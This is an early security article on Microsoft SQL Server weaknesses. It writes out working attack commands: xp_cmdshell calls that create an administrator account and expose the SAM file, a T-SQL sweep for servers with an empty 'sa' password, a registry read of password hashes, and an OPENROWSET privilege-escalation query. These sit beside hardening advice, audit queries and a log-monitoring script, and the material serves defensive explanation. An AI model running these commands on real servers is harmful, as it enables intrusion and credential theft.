SQL SERVER Security issues


By xundi <Security Focus>
xundi1@21cn.com
www.xfocus.org

At present there are many ways to break into an NT server, such as exploiting IIS vulnerabilities, but you may not know that attacks that go through the SQL database server attached to an NT server also account for a considerable share. See the following news item:
http://www.vnunet.com/news/1110838
Several websites defaced by Herbless, such as the legoland.co.uk site, were compromised through SQL Server to gain control of the system. Therefore, protecting SQL Server is essential. Here I have collected some of its vulnerabilities for your reference.

----------------------------------------------------------------
First, let's look at the network protocol libraries supported by the SQL Server service:

--------------------------------------------------------------------------------
| SQL Server Network Protocol Libraries                                        |
--------------------------------------------------------------------------------
| Protocol library | Possible vulnerabilities                      | Encrypted |
--------------------------------------------------------------------------------
| Named Pipes      | -- Uses the NT SMB ports (TCP 139, UDP 137    | No        |
|                  |    and 138) for communication, so it can be   |           |
|                  |    controlled by a firewall; open access to   |           |
|                  |    the pipe is also a minor weakness.         |           |
|                  | -- Username, password and data are sent       |           |
|                  |    unencrypted; anyone can capture them with  |           |
|                  |    a sniffer.                                 |           |
--------------------------------------------------------------------------------
| IP Sockets       | -- Port 1433 is enabled by default and can be | No        |
|                  |    found with a port scanner.                 |           |
|                  | -- Data can be intercepted by a sniffer.      |           |
--------------------------------------------------------------------------------
| Multi-Protocol   | -- The client must support NT RPCs, which may | Yes       |
|                  |    cause problems in a heterogeneous          |           |
|                  |    environment.                               |           |
|                  | -- A random TCP port is used by default, but  |           |
|                  |    it can be fixed so that a firewall can     |           |
|                  |    control it (see KB Q164667).               |           |
|                  | -- Encryption is an option and is not         |           |
|                  |    selected by default.                       |           |
--------------------------------------------------------------------------------
| NWLink           | -- Risk of data being intercepted by a        | No        |
|                  |    sniffer.                                   |           |
--------------------------------------------------------------------------------
| AppleTalk (ADSP) | -- Risk of data being intercepted by a        | No        |
|                  |    sniffer.                                   |           |
--------------------------------------------------------------------------------
| Banyan Vines     | -- Risk of data being intercepted by a        | No        |
|                  |    sniffer.                                   |           |
--------------------------------------------------------------------------------

We recommend using the Named Pipes or Multi-Protocol libraries; if possible, use Multi-Protocol with the encryption option enabled. If none of these can be used, use the IP Sockets protocol, change its default port, and check the system regularly to make sure no sniffer is present. In addition, consider using a web server or COM components as the business-object layer of the application, and use a secure channel between that middle tier and the SQL Server (many third-party products can encrypt the communication on this leg).

-----------------------------------------------------------------------
Next, let's look at the security modes of SQL Server and how they work.

The security mode defines how SQL Server authenticates the users who want to use its services. The security modes of SQL Server 6.5 differ from those of SQL Server 7.0, as shown below:

--------------------------------------------------------------------------------
| Security mode | SQL Server 6.5                    | Changes in SQL Server 7.0  |
--------------------------------------------------------------------------------
| Standard      | -- The login is defined in SQL    | -- Standard mode is no     |
|               |    Server and given a password.   |    longer used in 7.0.     |
|               | -- SQL Server login accounts are  |                            |
|               |    separate from Windows NT.      |                            |
--------------------------------------------------------------------------------
| Integrated    | -- Uses Security Manager to map   | -- Becomes "Windows NT     |
|               |    NT accounts to SQL accounts.   |    only" mode.             |
|               | -- A user connecting to SQL       | -- Works only on Windows   |
|               |    Server needs no separate login |    NT; not supported on    |
|               |    and password.                  |    Win9x.                  |
|               | -- The password is never stored   | -- NT groups can be granted|
|               |    in the application and is not  |    access directly, which  |
|               |    sent in plaintext over the     |    is convenient to manage |
|               |    network.                       |    (note the BUILTIN group |
|               | -- SQL Server uses NT to          |    generated on the local  |
|               |    authenticate the user, so NT   |    system).                |
|               |    account policies such as       |                            |
|               |    expiration apply.              |                            |
|               | -- Requires the Named Pipes or    |                            |
|               |    Multi-Protocol library.        |                            |
--------------------------------------------------------------------------------
| Mixed         | -- Provides the features of both  | -- Becomes "SQL Server and |
|               |    modes above: clients that can  |    Windows NT" mode.       |
|               |    establish a trusted connection | -- Use Windows NT only     |
|               |    log on with integrated         |    mode whenever possible. |
|               |    security; clients that cannot  |                            |
|               |    fall back to a standard login. |                            |
--------------------------------------------------------------------------------

Logging in is only the first step. Once logged in, a user must still be granted access to each individual database: the sysusers table of every database the user works with must contain an entry for that user. For security, therefore, keep an eye on the "guest" account in your databases; if you are not careful, it gives people you never intended access to your data.

For details, refer to Microsoft's website:

http://www.microsoft.com/technet/SQL/Technote/secure.asp


---------------------------------------------------------------------

SQL Server security issues:

If the "sa" account exists with a blank password, then, since sa is a member of SQL Server's security administrators, the xp_cmdshell extended stored procedure can be used, for example:

xp_cmdshell "net user testuser UgotHacked /ADD"
and then:
xp_cmdshell "net localgroup Administrators testuser /ADD"

In this way the attacker has successfully added a user on the SQL Server machine.

Of course, a remote connection usually requires port 1433 to be open, and is made through an MSSQL client.

Of course, you can also use:

xp_cmdshell "rdisk /s-"

This rebuilds the information in the winnt\repair directory without prompting the user. Once the SAM backup exists, the attacker can share it over an SMB connection:

xp_cmdshell "net share getsam=c:\winnt\repair"

fetch the file through the share, and then run it through L0phtCrack. If the SMB ports are blocked by a firewall, the attacker can instead copy the sam._ file into the web directory for an anonymous browser to download. If IIS is not enabled, why not use tftp :).

OK. Through this compromised SQL Server, an attacker can go on to explore the internal network. The following SQL script lists the other SQL servers on the network that have an 'sa' account with an empty password:

-----------------------------------------------------------------------

-- Create temp table to store enumerated servers
SET NOCOUNT ON
CREATE TABLE #temp (shelldump varchar(255))
-- osql -L prints "Servers:" followed by one server name per line
INSERT #temp EXEC xp_cmdshell 'osql -L'
DECLARE @current_server varchar(255), @conn_string varchar(255)
DECLARE sql_cursor CURSOR FOR SELECT * FROM #temp
OPEN sql_cursor
FETCH NEXT FROM sql_cursor INTO @current_server

-- Loop through potential targets and check for null sa accounts
-- If target is vulnerable, version information will be displayed
WHILE @@FETCH_STATUS = 0
BEGIN
    IF @current_server <> 'Servers:'
    BEGIN
        SELECT @current_server = rtrim(ltrim(@current_server))
        SELECT @conn_string = 'exec xp_cmdshell ''osql -S ' + @current_server + ' -Usa -P -Q "select @@version"'''
        PRINT 'attempting connection to server: ' + @current_server
        EXECUTE (@conn_string)
        PRINT '================================================================='
    END
    FETCH NEXT FROM sql_cursor INTO @current_server
END

-- Clean up
CLOSE sql_cursor
DEALLOCATE sql_cursor
DROP TABLE #temp

----------------------------------------------------------------------

Of course, some people may have disabled the xp_cmdshell extended stored procedure. In that case the following can also be used:

xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'

If the MSSQLServer service runs under the local system account and syskey is not installed on the system, this returns the encrypted passwords or SIDs from the registry.

--------------------------------------------------------------------------

Another vulnerability is the ad hoc heterogeneous queries privilege escalation. For details see Microsoft's description:
http://www.microsoft.com/technet/security/bulletin/fq00-014.asp

For this vulnerability, the following exploit can be used to gain elevated rights:

SELECT * FROM OPENROWSET('SQLOLEDB', 'Trusted_Connection=Yes;Data Source=myserver',
    'SET FMTONLY OFF EXECUTE master..xp_cmdshell "dir c:\"')

This is also one of the favourite ways of executing other commands.

---------------------------------------------------------------------------

There is also a recent vulnerability, Extended Stored Procedure Parameter Parsing, described in detail at:
http://www.microsoft.com/technet/security/bulletin/ms00-092.asp

The main problem is that the ODS (Open Data Services) API provides a function, srv_paraminfo(), which extended stored procedures use to parse their parameters when they are called, for example:

exec <stored procedure name> <parameter 1>, <parameter 2>, ...

To list the directory tree of "c:\winnt", this would be:

exec xp_dirtree 'c:\winnt'

However, the length of each parameter is not checked, so passing an overly long string overwrites other data on the stack and can cause a buffer overflow.

The extended stored procedures currently known to be affected are:

1. xp_peekqueue (xpqueue.dll)
   xp_printstatements (xprepl.dll)

   Passing a long string as the first parameter overwrites the return address saved by the exception handler.

2. xp_proxiedmetadata (xprepl.dll)

   This stored procedure takes four parameters. Passing a long string as the second parameter overwrites the return address saved by the exception handler.

3. xp_SetSQLSecurity (xpstar.dll)

   This stored procedure takes four parameters. Passing a long string as the third parameter terminates the whole SQL Server process immediately.

4. xp_displayparamstmt (xprepl.dll)
   xp_enumresultset (xprepl.dll)
   xp_showcolv (xprepl.dll)
   xp_updatecolvbm (xprepl.dll)

   Passing a long string as the first parameter causes an illegal operation and overwrites the return address saved by the exception handler.

Here is a trick for everyone. If you want to know which DLL an extended stored procedure is implemented in, you can run the following:

select o.name, c.text from dbo.syscomments c, dbo.sysobjects o
where c.id = o.id and o.name = 'xp_peekqueue'

This gives you the DLL behind the extended stored procedure. If Microsoft has no patch yet, you can temporarily rename that DLL file. Of course, some DLLs implement several extended stored procedures and cannot be renamed blindly, or you will lose the other functions as well; use the following query to see which extended stored procedures a DLL provides:

select o.name, c.text from dbo.syscomments c, dbo.sysobjects o
where c.id = o.id and c.text = 'xpqueue.dll'

Fortunately, Microsoft has released a patch. You can find it at the following location instead of hunting for the DLLs one by one:

http://support.microsoft.com/support/SQL/xp_security.asp

This vulnerability was discovered by @stake, which also provides demo test code, available here:

http://www.atstake.com/research/advisories/2000/sqladv2-poc.c

--------------------------------------------------------------------------

OK. Of course, SQL Server also has some other, relatively minor, vulnerabilities, such as the one discovered by ISS: the administrator login id is stored in the registry under a simple encryption that is easy to reverse. See http://xforce.iss.net/alerts/advise45.php3 for details. You can look for the others elsewhere.

---------------------------------------------------------------------

Some security suggestions for SQL Server systems:

-- Install the latest security patches:
   Windows NT 4.0 - Service Pack 6a
   SQL Server 6.5 - Service Pack 5a
   SQL Server 7.0 - Service Pack 2 (plus the various hotfixes; check
   http://www.microsoft.com/download)
   SQL Server 2000 - Hotfix S80233i.exe (Intel)
   Of course, everyone should keep a close eye on Microsoft's security bulletins.

-- Do not use the default port 1433 for IP Sockets. If you use Multi-Protocol,
   change its port as well.

-- Do not embed the 'sa' password in any application, such as VB/Delphi apps or
   the global.asa file. "sa" is the default SQL Server account, its rights are
   comparable to those of the Administrator account in Windows NT, and its
   password is empty by default.

-- Change the passwords of the 'sa' and 'probe' accounts.

-- Ensure that the SQL Server error logs are kept on an NTFS file system.

-- If you do not need xp_cmdshell, do not leave this extended stored procedure
   on the server; drop it with sp_dropextendedproc. In any isql window, enter:
   use master
   sp_dropextendedproc 'xp_cmdshell'

-- Drop the OLE Automation stored procedures (note that some Enterprise Manager
   features also depend on them):

   sp_OACreate        sp_OADestroy
   sp_OAGetErrorInfo  sp_OAGetProperty
   sp_OAMethod        sp_OASetProperty
   sp_OAStop

-- Remove the registry access procedures you do not need:

   xp_regaddmultistring
   xp_regdeletekey
   xp_regdeletevalue
   xp_regenumvalues
   xp_regread
   xp_regremovemultistring
   xp_regwrite

-- Remove other system stored procedures if you feel they still pose a threat.
   Be careful when dropping these procedures: test on a test machine first to
   make sure the system can still do its work normally. They include:

   sp_bindsession      sp_cursor            sp_cursorclose
   sp_cursorfetch      sp_cursoropen        sp_cursoroption
   sp_getbindtoken     sp_GetMBCSCharLen    sp_IsMBCSLeadByte
   sp_OACreate         sp_OADestroy         sp_OAGetErrorInfo
   sp_OAGetProperty    sp_OAMethod          sp_OASetProperty
   sp_OAStop           sp_replcmds          sp_replcounters
   sp_repldone         sp_replflush         sp_replstatus
   sp_repltrans        sp_sdidebug          xp_availablemedia
   xp_cmdshell         xp_deletemail        xp_dirtree
   xp_dropwebtask      xp_dsninfo           xp_enumdsn
   xp_enumerrorlogs    xp_enumgroups        xp_enumqueuedtasks
   xp_eventlog         xp_findnextmsg       xp_fixeddrives
   xp_getfiledetails   xp_getnetname        xp_grantlogin
   xp_logevent         xp_loginconfig       xp_logininfo
   xp_makewebtask      xp_msver             xp_perfend
   xp_perfmonitor      xp_perfsample        xp_perfstart
   xp_readerrorlog     xp_readmail          xp_revokelogin
   xp_runwebtask       xp_schedulersignal   xp_sendmail
   xp_servicecontrol   xp_snmp_getstate     xp_snmp_raisetrap
   xp_sprintf          xp_sqlinventory      xp_sqlregister
   xp_sqltrace         xp_sscanf            xp_startmail
   xp_stopmail         xp_subdirs           xp_unc_to_drive

-- Remove the guest user from the databases.

-- Disable SQL Mail, so that it cannot be used to deliver Trojans and viruses.

-- Set up a scheduled task that periodically runs:

   findstr /C:"Login Failed" \mssql7\log\*.*

   and redirects the output to a file or mails it to the administrator's mailbox.

-- Check regularly for accounts with empty passwords:

   use master
   select name, password
   from syslogins
   where password is null
   order by name

-- Check which stored procedures and extended stored procedures can be executed
   without 'sa' rights (that is, with permissions granted to public, uid 0):

   use master
   select sysobjects.name
   from sysobjects, sysprotects
   where sysprotects.uid = 0
     and xtype in ('X', 'P')
     and sysobjects.id = sysprotects.id
   order by name
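The "Login Failed" task above only greps the error log. The following script, added here as an example and not part of the original article, parses SQL Server 7.0-style errorlog lines, counts failures per login, and flags a burst of failures against one login, which is the trace that a sweep for a null 'sa' password (like the script shown earlier) leaves behind. The log lines are constructed samples in the 7.0 errorlog format (timestamp, "logon" source column, message).

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the SQL Server 7.0 errorlog style (not a real log).
SAMPLE_LOG = """\
2000-12-01 14:03:21.10 logon     Login succeeded for user 'appuser'.
2000-12-01 14:03:22.17 logon     Login failed for user 'sa'.
2000-12-01 14:03:22.41 logon     Login failed for user 'sa'.
2000-12-01 14:03:22.66 logon     Login failed for user 'sa'.
2000-12-01 14:03:23.02 logon     Login failed for user 'probe'.
2000-12-01 14:03:23.30 logon     Login failed for user 'sa'.
2000-12-01 14:03:23.55 logon     Login failed for user 'sa'.
"""

# Timestamp (fractional seconds dropped), the 'logon' source column, then the message.
FAILED_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+logon\s+"
    r"Login failed for user '(?P<user>[^']*)'"
)

def parse_failed_logins(text):
    """Return (timestamp, login name) for every 'Login failed' line."""
    events = []
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            events.append((datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S"),
                           m.group("user")))
    return events

def failures_per_login(events):
    """Count failures per login name (the findstr task, summarised)."""
    return Counter(user for _, user in events)

def find_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """Logins with at least `threshold` failures inside any sliding `window`."""
    times_by_user = defaultdict(list)
    for ts, user in events:
        times_by_user[user].append(ts)
    bursts = {}
    for user, times in times_by_user.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)  # failures in the current window
        if best >= threshold:
            bursts[user] = best
    return bursts
```

Run against the real \mssql7\log files, a non-empty result from find_bursts is the event worth mailing to the administrator rather than the raw findstr output.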